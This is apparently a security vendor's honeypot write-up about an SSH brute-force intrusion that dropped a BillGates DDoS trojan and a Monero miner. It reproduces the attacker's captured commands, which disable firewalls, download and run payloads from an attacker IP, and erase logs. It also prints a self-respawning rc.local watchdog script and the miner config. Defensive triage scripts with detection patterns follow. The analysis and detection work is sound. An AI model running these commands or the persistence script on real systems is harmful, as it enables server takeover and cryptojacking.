This article is published by the Security Data Brain team.

Security Data Brain draws on more than ten years of accumulated experience in government, education, finance and other critical industries. Relying on Xuanwu Shield, a honeypot network, global asset detection and other capabilities, together with hundreds of domestic and foreign intelligence sources, it forms a professional threat intelligence center for server security. It mainly tracks and researches the latest network attacks against servers in China's critical industries, providing users with high-quality intelligence data.

1 Introduction

Since its birth, virtual currency has had an ambiguous relationship with the black industry: it started out as a medium for underground transactions and went on to become the wallet that lets ransomware evade tracking. Wherever the money goes, the black industry is sure to follow.

As the market price of virtual currency has risen, more and more of the black industry has turned from merely spending it to mining it.

Of course, the black industry itself generally lacks the hardware needed to produce virtual currency, so it turned its mind to mining on "broilers" (compromised servers). The quality of these machines varies widely, but every little helps, and the emergence of mining pools has made the black industry's path into mining much easier.

2 Opening

Recently, the Heng threat intelligence team found traces of illicit mining in its honeypot system. Hey, big shot of the black industry, I work in network security; isn't it a bit much to come mining on my machines? Shall we do battle?

One day, after much laborious effort, the attacker's automated brute-force script finally broke into the honeypot (our programmer brother was off slacking...). As usual, the big shot first checks the machine's configuration and performance:

    cat /proc/cpuinfo
    free -m

With a 24-core, 48-thread CPU and a full 128 GB of RAM, he must have been thrilled.

First comes the usual set of firewall shutdown commands: both iptables and SuSEfirewall2 are stopped (the last command, reSuSEfirewall2, appears to be a mistyped rcSuSEfirewall2, the SUSE rc wrapper script; it is reproduced here exactly as captured).

    /etc/init.d/iptables stop
    service iptables stop
    SuSEfirewall2 stop
    reSuSEfirewall2 stop

Next, wget is made usable, the payload is downloaded and executed, and the shell history is cleared (which, unfortunately for the attacker, our honeypot recorded in full):

    chattr -i /usr/bin/wget
    chmod 755 /usr/bin/wget
    yum install -y wget
    pkill sysxlv
    rm -f /etc/sysxlv
    rm -f /etc/sysxlv.1
    wget -c -P /etc/ http://111.73.45.73:9789/sysxlv
    chmod 755 /etc/sysxlv
    nohup /etc/sysxlv > /dev/null 2>&1 &
    export HISTFILE=/dev/null
    rm -f /var/log/wtmp
    history -c
    exit

From this we can infer that an earlier version, sysxlv.1, had been deployed before; the script looks for and removes it before starting the new one.

The file captured in the honeypot and its hash value (table in the original).

Now let's step into the analysis and see what exactly this black-industry big shot wants to do on the server.

3 Development

sysxlv looks like an executable, so let's first look at the basics.

It is indeed an ELF32 executable and does not appear to be packed, so we go straight to the disassembler, IDA Pro.

It looks like the BillGates DDoS trojan family, which has both Windows and Linux variants. It supports several attack modes, such as TCP SYN flood, UDP flood, CC (HTTP flood) and DNS amplification attacks.

Let's take a brief look at the functions and structure of this trojan.

1. Self-verification and anti-debugging

First, the trojan decrypts configuration information in the .rodata segment, obtains the expected file size and compares it with its own, and checks whether gdb is present in the process list, as an anti-debugging measure.

2. CheckGatesType

In this function the trojan examines its own path and returns different values; depending on the return value it takes a different startup mode. The table below (in the original) lists the conditions for each return value.

3. MainBeikong

The most common installation mode, and the default, is MainBeikong. This function mainly does the following. It first calls daemon() to fork a new process, and the parent calls exit(0), so that the starting process cannot be found with ps -a.

Next, it checks whether earlier installations exist and removes their files if so, adds itself to autostart (SetAutoStart), and then starts MainProcess.

4. MainProcess

The main process does the following.

Execution first sleeps for 0x7d0 (2000 ms). It then deletes the temporary upgrade file, reads DNS cache information from /etc/resolv.conf, configuration from conf.n, and the status of the running program from cmd.n.

It initializes the CManager, then sleeps and waits for C2 instructions to execute.

The figure below (in the original) shows the trojan's main attack capabilities.

5. Decrypting data

Static analysis shows that the C2 address is not stored in the program in plaintext but is decrypted at runtime. Below we do some simple dynamic debugging with EDB.

A string that appears to be encrypted was found in IDA.

Using the function name, we set a breakpoint at the start of the decryption function.

Execution reaches 0x08130830, where the string found above is passed in.

After decryption we obtain the callback (C2) address.

4 Turn

From the above analysis, this looks like a small-time black-industry operator using a mainstream DDoS trojan.

But when we look at the honeypot log, there’s more to it than that.

But three minutes after dropping and running the trojan and disconnecting, the attacker brute-forced their way into the system again.

    /etc/init.d/iptables stop
    service iptables stop
    SuSEfirewall2 stop
    reSuSEfirewall2 stop
    chattr -i /usr/bin/wget
    chmod 755 /usr/bin/wget
    yum install wget -y
    pkill sysxlv
    rm -f /etc/sysxlv
    wget -c -P /etc/ http://111.73.45.73:9789/sysxlj
    wget -c -P /etc/ http://111.73.45.73:9789/config.json
    chmod 755 /etc/sysxlj
    nohup /etc/sysxlj > /dev/null 2>&1 &
    wget -c -P /etc/ http://111.73.45.73:9789/jourxlv
    chmod 755 /etc/jourxlv
    nohup /etc/jourxlv > /dev/null 2>&1 &
    export HISTFILE=/dev/null
    rm -f /var/log/wtmp
    history -c
    exit

The hash values of the files (table in the original).

Through the analysis below, let's work out what else this attacker wanted to do in our honeypot.

Let's start with config.json:

    {
        "algo": "cryptonight",
        "api": {
            "port": 0,
            "access-token": null,
            "worker-id": null,
            "ipv6": false,
            "restricted": true
        },
        "av": 0,
        "background": false,
        "colors": true,
        "cpu-affinity": null,
        "cpu-priority": null,
        "donate-level": 1,
        "huge-pages": true,
        "hw-aes": null,
        "log-file": null,
        "max-cpu-usage": 75,
        "pools": [
            {
                "url": "mine.ppxxmr.com:3333",
                "user": "471Bu7QT79ufDEqDSoKnV3V3aycs5oohTgW5ZTuamAifPBM4M91my5gX9cpp9jGDgcCAuRTtwVKD6hsDAsY7AU19HWjrsbJ",
                "pass": "x",
                "rig-id": null,
                "nicehash": false,
                "keepalive": false,
                "variant": 1
            }
        ],
        "print-time": 60,
        "retries": 5,
        "retry-pause": 5,
        "safe": false,
        "threads": null,
        "user-agent": null,
        "watch": false
    }

This is a Monero (XMR) mining configuration, in the config.json format used by the XMRig miner.

Mining pool: mine.ppxxmr.com:3333

Wallet address: 471Bu7QT79ufDEqDSoKnV3V3aycs5oohTgW5ZTuamAifPBM4M91my5gX9cpp9jGDgcCAuRTtwVKD6hsDAsY7AU19HWjrsbJ

Our Data Brain also shows clearly that this pool has been contacted by a large number of malicious samples (screenshot in the original).
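As an added example (not code from the original article or from the miner's author), the following Python script turns a captured XMRig-style config.json like the one above into IOCs and abuse indicators: pool host and port for a blocklist, the payout wallet with a Monero address format check, and the CPU settings that tell you how hard the box is going to be pushed. The embedded SAMPLE_CONFIG is the captured config trimmed to the fields the audit uses. Two assumptions are relied on: a standard Monero address is 95 base58 characters starting with 4 (subaddresses start with 8, integrated addresses are 106 characters), and in XMRig a null "threads" value means the miner chooses the thread count itself; the address checksum is deliberately not verified.

```python
import json
import re

# Monero uses the Bitcoin base58 alphabet (no 0, O, I, l).
_B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

# The captured config.json from above, trimmed to the fields this audit uses.
SAMPLE_CONFIG = """
{
    "algo": "cryptonight",
    "donate-level": 1,
    "max-cpu-usage": 75,
    "threads": null,
    "pools": [
        {
            "url": "mine.ppxxmr.com:3333",
            "user": "471Bu7QT79ufDEqDSoKnV3V3aycs5oohTgW5ZTuamAifPBM4M91my5gX9cpp9jGDgcCAuRTtwVKD6hsDAsY7AU19HWjrsbJ",
            "pass": "x"
        }
    ]
}
"""


def looks_like_monero_address(addr):
    """Format-only check (assumption stated in the lead-in): 95 base58 chars starting
    with 4 or 8, or 106 chars starting with 4. The Keccak checksum is not verified,
    so this is a triage filter, not proof that the address is valid."""
    if not isinstance(addr, str) or not all(c in _B58 for c in addr):
        return False
    return (len(addr) == 95 and addr[0] in "48") or (len(addr) == 106 and addr[0] == "4")


def split_pool_url(url):
    """Split an XMRig pool URL (optional stratum+tcp:// scheme) into (host, port)."""
    bare = re.sub(r"^[a-z+]+://", "", url.strip())
    host, sep, port = bare.rpartition(":")
    if not sep or not port.isdigit():
        return bare, None
    return host, int(port)


def audit_miner_config(text):
    """Extract IOCs and resource-abuse indicators from an XMRig-style config.json."""
    cfg = json.loads(text)
    pools = []
    for pool in cfg.get("pools", []):
        host, port = split_pool_url(pool.get("url", ""))
        wallet = pool.get("user")
        pools.append({
            "host": host,
            "port": port,
            "wallet": wallet,
            "wallet_format_ok": looks_like_monero_address(wallet),
        })
    return {
        "algo": cfg.get("algo"),
        "pools": pools,
        "max_cpu_usage": cfg.get("max-cpu-usage"),
        # Assumption: XMRig picks the thread count itself when "threads" is null,
        # so every core is fair game up to max-cpu-usage.
        "autodetect_threads": cfg.get("threads") is None,
        "donate_level": cfg.get("donate-level"),
    }


def blocklist_entries(report):
    """Pool hosts suitable for a firewall or DNS blocklist."""
    return sorted({p["host"] for p in report["pools"] if p["host"]})


if __name__ == "__main__":
    report = audit_miner_config(SAMPLE_CONFIG)
    print(json.dumps(report, indent=2))
    print("block:", blocklist_entries(report))
```

The wallet address is the most durable indicator here: pools and drop servers change, but the payout address ties separate incidents to the same operator, so it is worth recording alongside the file hashes.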

Now look at the shell script jourxlv.

The comment header mentions sysxlj, which may be the author's handle.

    #!/bin/bash
    #Welcome like-minded friends to come to exchange.
    #We are a group of people who have a dream.
    # by:sysxlj
    # 2016-03-10

First it stops iptables, writes itself into /etc/rc.local so that it starts at boot, and backs up sysxlj and itself to /usr/bin under different names (aher and keudl).

    service iptables stop > /dev/null 2>&1 &
    host_dir=`pwd`
    if [ "sh $host_dir/jourxlv &" = "$(cat /etc/rc.local | grep $host_dir/jourxlv | grep -v grep)" ]; then
        echo ""
    else
        echo "sh $host_dir/jourxlv &" >> /etc/rc.local
    fi
    cp sysxlj /usr/bin/aher
    cp jourxlv /usr/bin/keudl

Then it loops forever as a watchdog: if no sysxlj process is running, it restores the binary from /usr/bin/aher when the working copy is missing and starts it again; if more than one copy is running, it kills all but one. (The captured listing ends at the inner fi; the loop's closing done is not shown.)

    while [ 1 ]; do
        Centos_sshd_killn=$(ps aux | grep "$host_dir/sysxlj" | grep -v grep | wc -l)
        if [[ $Centos_sshd_killn -eq 0 ]]; then
            if [ ! -f "$host_dir/sysxlj" ]; then
                if [ -f "/usr/bin/aher" ]; then
                    cp /usr/bin/aher $host_dir/sysxlj
                    chmod 755 ./sysxlj
                else
                    echo "No weeget"
                fi
            fi
            ./sysxlj &
        elif [[ $Centos_sshd_killn -gt 1 ]]; then
            for killed in $(ps aux | grep "$host_dir/sysxlj" | grep -v grep | awk '{print $2}'); do
                Centos_sshd_killn=$(($Centos_sshd_killn-1))
                if [[ $Centos_sshd_killn -eq 1 ]]; then
                    continue
                else
                    kill -9 $killed
                fi
            done
        else
            echo ""
        fi

sysxlj is named similarly to sysxlv but is probably not the same program. Since we also found the mining configuration file alongside it, we have reason to believe that sysxlj is a Monero miner, configured to consume a significant share of the server's CPU (max-cpu-usage 75).

Searching for sysxlj online, we found the following post (screenshot in the original),

which is exactly what we suspected.

5 Conclusion

At first this looked like a routine DDoS trojan drop, but the real purpose was to use the server's spare resources to mine Monero.

Here is a summary of the whole attack process:

  1. Scan network segments on a large scale with SSH brute-forcing to obtain server shells
  2. Stop the iptables and SuSEfirewall firewalls on the host
  3. Use wget to download the DDoS trojan from the attacker's own server, make it executable and run it
  4. Download the mining program, its configuration and the watchdog script, and mine in the background with the server's resources
  5. Delete log and history information
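The two command sequences captured above follow exactly the pattern summarized in this list, which makes them a good fit for automated triage. As an added example (not code from the original article), the Python script below takes a honeypot session as one shell command per line, maps each command onto a stage of this chain with ordered regular-expression rules, and pulls out the indicators a responder wants first: download URLs and hosts, the paths handed to nohup, and the process names the attacker kills. The stage names and rules are this example's own choices; SESSION_1 is the first captured session from above, re-typed one command per line.

```python
import re

# Stage rules in priority order: the first rule that matches a command wins.
# anti_forensics comes first so that "rm -f /var/log/wtmp" is not mistaken for
# ordinary cleanup, and disable_firewall is checked before the generic
# "ends with &" execute rule.
STAGE_PATTERNS = [
    ("anti_forensics", re.compile(r"HISTFILE=|\bhistory\s+-c\b|\brm\s+-r?f\s+/var/log/")),
    ("disable_firewall", re.compile(
        r"^(?=.*\b(?:stop|disable)\b).*(?:iptables|SuSEfirewall2|firewalld|ufw)")),
    ("stage_tooling", re.compile(
        r"^(?:chattr|chmod)\s+\S+\s+/usr/bin/(?:wget|curl)\b|^(?:yum|apt|apt-get)\s+install\b")),
    ("remove_previous", re.compile(r"^(?:pkill|killall)\b|^rm\s+-r?f\s+")),
    ("download", re.compile(r"^(?:wget|curl)\b")),
    ("execute", re.compile(r"^nohup\b|^chmod\s+[0-7]+\s+|^\./|&\s*$")),
]


def classify(command):
    """Return the attack stage a single shell command belongs to, or None."""
    for stage, pattern in STAGE_PATTERNS:
        if pattern.search(command):
            return stage
    return None


def attack_chain(commands):
    """Distinct stages in order of first appearance."""
    chain = []
    for cmd in commands:
        stage = classify(cmd)
        if stage and stage not in chain:
            chain.append(stage)
    return chain


def extract_iocs(commands):
    """Download URLs, remote hosts, executed payload paths and killed process names."""
    iocs = {"urls": set(), "hosts": set(), "executed": set(), "killed": set()}
    for cmd in commands:
        for url in re.findall(r"https?://\S+", cmd):
            iocs["urls"].add(url)
            iocs["hosts"].add(re.sub(r"^https?://", "", url).split("/")[0])
        m = re.match(r"^nohup\s+(\S+)", cmd)
        if m:
            iocs["executed"].add(m.group(1))
        m = re.match(r"^(?:pkill|killall)\s+(?:-\S+\s+)*(\S+)", cmd)
        if m:
            iocs["killed"].add(m.group(1))
    return {k: sorted(v) for k, v in iocs.items()}


def analyze_session(log_text):
    """Analyze one captured session given as newline-separated shell commands."""
    commands = [line.strip() for line in log_text.splitlines() if line.strip()]
    return {
        "chain": attack_chain(commands),
        "iocs": extract_iocs(commands),
        "unclassified": [c for c in commands if classify(c) is None],
    }


# The first captured session from above, one command per line.
SESSION_1 = """
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
chattr -i /usr/bin/wget
chmod 755 /usr/bin/wget
yum install -y wget
pkill sysxlv
rm -f /etc/sysxlv
rm -f /etc/sysxlv.1
wget -c -P /etc/ http://111.73.45.73:9789/sysxlv
chmod 755 /etc/sysxlv
nohup /etc/sysxlv > /dev/null 2>&1 &
export HISTFILE=/dev/null
rm -f /var/log/wtmp
history -c
exit
"""

if __name__ == "__main__":
    import json
    print(json.dumps(analyze_session(SESSION_1), indent=2))
```

The "unclassified" list is as useful as the chain itself: anything a brute-forced session runs that the rules do not recognize is exactly what a reviewer should read by hand, and it is how new stages (here, the second session's extra downloads) get added to the rule set.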

Below is information about the intruding IP address (screenshot in the original).

The IP, located in Shangrao, Jiangxi, has been flagged as a malicious host both by our intelligence team and by multiple open-source intelligence feeds.

Below is information about the files involved in the intrusion (screenshot in the original).

Defense tips:

  1. Avoid weak SSH passwords and change them periodically.
  2. Subscribe to threat intelligence to obtain an SSH brute-force blacklist and block it in one step.
  3. Back up logs and periodically check whether any process is consuming a large share of system resources.
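Defense tip 3 and the jourxlv analysis above point at the same host-side checks: an rc.local entry that launches a script in the background, executables running from a relative path or from a drop directory such as /etc or /tmp, and a process pinned at high CPU. As an added example (not code from the original article), this Python script performs those three checks over text you would normally get from /etc/rc.local and `ps aux`; the embedded SAMPLE_RC_LOCAL and SAMPLE_PS inputs are constructed to mirror the watchdog's footprint (they are not captured honeypot data), and the drop-directory list and 50 % CPU threshold are this example's own choices.

```python
import re

# Directories that malware typically drops into but that legitimate daemons rarely run from.
DROP_DIRS = re.compile(r"^/(?:etc|tmp|var/tmp|dev/shm)/")
INTERPRETERS = {"sh", "bash", "nohup", "python", "perl"}

# Constructed sample inputs modelled on the jourxlv watchdog analysed above.
SAMPLE_RC_LOCAL = """\
#!/bin/sh
touch /var/lock/subsys/local
sh /etc/jourxlv &
exit 0
"""

SAMPLE_PS = """\
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1  19352  1544 ?        Ss   10:01   0:01 /sbin/init
root      2301  0.0  0.0 113000  1200 ?        S    10:05   0:00 sh /etc/jourxlv
root      2310 75.2  0.4 321000 51200 ?        Sl   10:05  40:12 ./sysxlj
root      2402  0.3  0.2  55000  3300 ?        S    10:10   0:00 sshd: root@pts/0
"""


def _target(cmdline):
    """The file a command line actually runs: skip a leading interpreter such as 'sh'."""
    tokens = cmdline.split()
    if not tokens:
        return None
    if tokens[0] in INTERPRETERS and len(tokens) > 1:
        return tokens[1]
    return tokens[0]


def rc_local_launchers(text):
    """Paths that rc.local launches in the background or through an interpreter."""
    found = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line == "exit 0":
            continue
        backgrounded = line.endswith("&")
        target = _target(line.rstrip("&").strip())
        if target and (backgrounded or line.split()[0] in INTERPRETERS):
            found.append(target)
    return found


def parse_ps(text):
    """Parse `ps aux` output into dicts with pid, cpu and the full command line."""
    procs = []
    for line in text.splitlines()[1:]:  # skip the header row
        parts = line.split(None, 10)    # COMMAND may contain spaces, so split at most 10 times
        if len(parts) < 11:
            continue
        procs.append({"pid": int(parts[1]), "cpu": float(parts[2]), "cmd": parts[10]})
    return procs


def cpu_hogs(ps_text, threshold=50.0):
    """Processes at or above the CPU threshold (percent, as reported by ps)."""
    return [p for p in parse_ps(ps_text) if p["cpu"] >= threshold]


def dropped_location_processes(ps_text):
    """Processes whose executable is a relative path or lives in a typical drop directory."""
    flagged = []
    for p in parse_ps(ps_text):
        target = _target(p["cmd"])
        if target and (target.startswith("./") or DROP_DIRS.match(target)):
            flagged.append(p)
    return flagged


def triage(rc_local_text, ps_text, cpu_threshold=50.0):
    return {
        "rc_local_launchers": rc_local_launchers(rc_local_text),
        "cpu_hogs": cpu_hogs(ps_text, cpu_threshold),
        "dropped_location_processes": dropped_location_processes(ps_text),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_RC_LOCAL, SAMPLE_PS).items():
        print(key, value)
```

Because the watchdog restarts the miner within seconds and keeps copies under /usr/bin, kill the watchdog (here the sh /etc/jourxlv process and its rc.local line) before the miner, and remove the backup copies it names (/usr/bin/aher and /usr/bin/keudl in the captured script) in the same step; otherwise the process list looks clean for a moment and the CPU graph climbs right back.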